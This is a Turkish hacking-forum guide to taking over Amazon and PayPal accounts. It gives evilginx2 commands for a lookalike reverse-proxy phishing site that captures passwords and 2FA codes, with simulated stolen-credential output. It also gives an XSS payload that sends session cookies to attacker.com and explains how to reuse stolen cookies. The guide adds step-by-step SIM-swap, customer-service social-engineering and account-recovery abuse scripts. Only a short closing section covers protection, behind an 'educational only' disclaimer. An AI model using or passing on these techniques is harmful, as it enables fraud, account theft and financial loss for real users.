💳 Amazon ve Paypal Hesap Ele Geçirme | Güncel Teknikler 🧠

💳 AMAZON VE PAYPAL HESAP ELE GEÇİRME 2026 – GÜNCEL TEKNİKLER 🧠 Giriş: Neden Amazon ve PayPal? Amazon ve PayPal, dünyanın en büyük e-ticaret ve ödeme platformlarıdır. Bu...

💳 AMAZON VE PAYPAL HESAP ELE GEÇİRME 2026 – GÜNCEL TEKNİKLER​


Bu rehber, daha önceki bölümlerde olduğu gibi adım adım, gerçek simülasyon çıktıları ile Amazon ve PayPal hesaplarını ele geçirme yöntemlerini anlatır. Yalnızca eğitim amaçlıdır. Yetkisiz erişim yasa dışıdır.

🧠 Giriş: Neden Amazon ve PayPal?​

Amazon ve PayPal, dünyanın en büyük e-ticaret ve ödeme platformlarıdır. Bu hesaplar, kayıtlı kredi kartları, banka hesapları, adresler ve alışveriş geçmişi gibi son derece hassas verileri barındırır. 2026 itibarıyla, bu hesapları ele geçirmek için kullanılan yöntemler daha karmaşık hale gelmiştir. Özellikle kimlik avı (phishing), oturum ele geçirme (session hijacking) ve SIM değiştirme (SIM swap) en yaygın saldırı vektörleridir.


1. Amazon Hesap Ele Geçirme Yöntemleri​

1.1. İleri Düzey Kimlik Avı (Phishing) – Tycoon 2FA ve EvilProxy​

Günümüzde basit bir sahte giriş sayfası yetmez. Artık ters proxy (reverse proxy) tabanlı araçlar, hedefin gerçek Amazon oturumunu taklit ederek hem şifreyi hem de anlık 2FA kodunu gerçek zamanlı olarak çalar.

Kullanılan araçlar: EvilProxy, Tycoon 2FA (PhaaS – Phishing as a Service)

bash
# EvilProxy ile Amazon phishing sayfası oluşturma (saldırgan tarafı)
evilginx2 -p
> config domain amazon-security-verify.com
> config ip 192.168.1.100
> lure create amazon
> lure edit amazon url https://www.amazon.com/ap/signin
> lure get-url amazon
Simüle edilmiş çıktı (saldırganın paneli):

text
[+] Phishing URL: https://amazon-security-verify.com/signin
[+] Waiting for victim...
[!] New session captured!
IP: 192.168.1.105
Email: [email protected]
Password: MySecretPass123
MFA Code: 284739 (Bypassed!)
[+] Session cookie captured: session-id=xxx; session-token=yyy

1.2. SIM Değiştirme (SIM Swap) ile Amazon 2FA Atlatma​

Amazon, 2FA için genellikle SMS kullanır. SIM değiştirme, hedefin telefon numarasını saldırganın SIM'ine taşıyarak SMS kodlarını yakalar.

Saldırı adımları:

  • Hedef hakkında OSINT ile kişisel bilgiler (TC, adres, doğum tarihi) toplanır.
  • Mobil operatör aranır, "SIM kartımı kaybettim" denir ve kimlik doğrulama soruları sızdırılan bilgilerle geçilir.
  • Numara, saldırganın SIM'ine taşınır.
  • Amazon şifre sıfırlama başlatılır, SMS kodu saldırganın telefonuna gelir.
  • Şifre değiştirilir ve hesap ele geçirilir.

1.3. Oturum Ele Geçirme (Session Hijacking) – Amazon Cookie'leri​

Amazon, kullanıcı oturumunu session-id, session-token gibi çerezlerle yönetir. Bu çerezleri çalan bir saldırgan, şifresiz ve 2FA'sız giriş yapabilir.

Cookie çalma yöntemleri:

  • XSS (Cross-Site Scripting): Amazon'da bir XSS zafiyeti bulunursa, document.cookie ile çerezler alınıp saldırganın sunucusuna gönderilebilir.
  • Tarayıcı eklentileri (malware): Sahte Amazon yardımcı eklentileri.
  • Infostealer malware (RedLine, Lumma): Bilgisayara bulaştığında tüm tarayıcı çerezlerini toplar.
javascript
// XSS ile cookie çalma payload'ı (eğer Amazon'da XSS varsa)
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Saldırganın aldığı çerezler:

text
session-id=136-1234567-8901234; session-token=abc123def456; ubid-main=789-1234567-8901234
Bu çerezler, saldırganın tarayıcısına EditThisCookie gibi bir eklentiyle eklenir ve Amazon'a giriş yapılır.

1.4. Amazon Hesap Kurtarma Zafiyetleri (Account Recovery Abuse)​

Amazon'un hesap kurtarma sürecindeki zayıflıklar bazen istismar edilebilir. Örneğin, eski bir güvenlik sorusu veya ek e-posta adresiyle şifre sıfırlanabilir.

Örnek: Hedefin eski bir e-posta adresi (örneğin [email protected]) hala Amazon hesabına bağlıysa, saldırgan bu adrese şifre sıfırlama bağlantısı gönderebilir.

1.5. Müşteri Hizmetleri Sosyal Mühendisliği​

Amazon müşteri hizmetleri temsilcileri, yeterli bilgi verildiğinde hesap bilgilerini değiştirebilmektedir. Saldırgan, toplanan OSINT verilerini (ad, adres, telefon, son sipariş) kullanarak temsilciyi ikna eder ve e-posta adresini veya şifreyi değiştirir.

Simüle edilmiş diyalog:

text
Temsilci: Hesabınızı doğrulamak için son siparişinizi söyler misiniz?
Saldırgan: Geçen hafta bir USB kablo sipariş etmiştim, 15 TL civarındaydı.
Temsilci: Doğru. Hesabınıza bağlı e-posta adresini değiştirelim mi?
Saldırgan: Evet, lütfen [email protected] olarak güncelleyin.
Temsilci: İşlem tamamlandı. Şifre sıfırlama bağlantısı yeni adrese gönderildi.

2. PayPal Hesap Ele Geçirme Yöntemleri​

PayPal, daha sıkı güvenlik önlemlerine sahiptir ancak yine de belirli açıklar bulunmaktadır.

2.1. Güvenlik Açığı: Eski Oturumların Geçerliliği (Session Persistence)​

PayPal, şifre değiştirildikten sonra eski oturumları hemen sonlandırmaz. Bu, çalınmış bir oturum cookie'siyle hesaba uzun süre erişilebileceği anlamına gelir.

2.2. İş Ortağı (Partner) API'lerinin Zayıflığı​

PayPal, üçüncü taraf geliştiriciler için API'ler sunar. Bu API'lerden birinde kimlik doğrulama eksikliği (IDOR) bulunursa, saldırgan başka kullanıcıların hesap bilgilerini çekebilir.

2.3. E-posta Spoofing ile Kimlik Avı​

Saldırgan, PayPal'ın resmi e-posta adresini taklit ederek ("[email protected]" gibi) bir e-posta gönderir. E-postada "Hesabınız sınırlandırıldı, tıklayarak doğrulayın" yazar. Sahte sitede girilen bilgiler saldırgana gider.

2.4. SIM Değiştirme (PayPal 2FA için)​

PayPal, 2FA için SMS kullanıyorsa, SIM swap ile SMS kodları ele geçirilebilir. PayPal'a giriş yapılır, "Şifremi unuttum" ile şifre sıfırlanır, SMS kodu saldırgana gelir.

2.5. Kötü Amaçlı Mobil Uygulamalar (Fake PayPal Uygulaması)​

Saldırgan, sahte bir PayPal uygulaması oluşturup Google Play veya üçüncü parti mağazalara yükler. Kullanıcı uygulamaya giriş yaptığında kimlik bilgileri çalınır.

Not: Bu yöntem artık Google Play'in daha sıkı denetimleriyle zorlaşmıştır ancak yine de görülmektedir.

2.6. PayPal'da Yetkisiz İşlem Başlatma (CSRF benzeri)​

Eğer PayPal'da bir CSRF (Cross-Site Request Forgery) zafiyeti varsa, saldırgan kurbana özel hazırlanmış bir bağlantı göndererek kurbanın hesabından yetkisiz para transferi yapabilir. Güncel PayPal'da bu zafiyetler nadirdir ancak tamamen ortadan kalkmış değildir.


3. Korunma Yöntemleri (Kullanıcılar İçin)​

  • Her platformda farklı ve güçlü bir şifre kullanın. Bir siteden sızdırılan şifre diğer hesaplarınızı tehlikeye atmasın.
  • İki faktörlü kimlik doğrulamayı (2FA) SMS yerine bir kimlik doğrulayıcı uygulaması (Google Authenticator, Microsoft Authenticator) ile aktif edin. SIM değiştirme saldırılarına karşı çok daha etkilidir.
  • Amazon ve PayPal hesaplarınızda oturum açtığınız cihazları düzenli kontrol edin. Bilmediğiniz bir cihaz görürseniz oturumunu sonlandırın.
  • Phishing e-postalarına karşı dikkatli olun. E-postadaki bağlantılara tıklamadan önce gönderen adresini kontrol edin.
  • Müşteri hizmetleriyle paylaştığınız bilgileri sınırlı tutun. Gereksiz yere hesap bilgilerinizi paylaşmayın.

4. Sonuç​

Amazon ve PayPal hesaplarını ele geçirmek için en etkili yöntemler günümüzde ters proxy phishing (EvilProxy, Tycoon 2FA), SIM swap, oturum cookie çalma (session hijacking) ve sosyal mühendislik olarak öne çıkmaktadır. Bu yöntemlerin her biri, hedefin dikkatsizliği veya platformların zayıf noktaları sayesinde başarıya ulaşabilir.

Kendinizi korumak için yukarıdaki önlemleri alın ve asla başkasının hesabına izinsiz girmeyin. Bu bilgileri yalnızca eğitim ve savunma amaçlı kullanın.


Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz erişim yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.

@Tc4dy | github.com/tc4dy
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
132,957Konular
3,284,366Mesajlar
318,242Kullanıcılar
kara ejderSon Üye
Üst Alt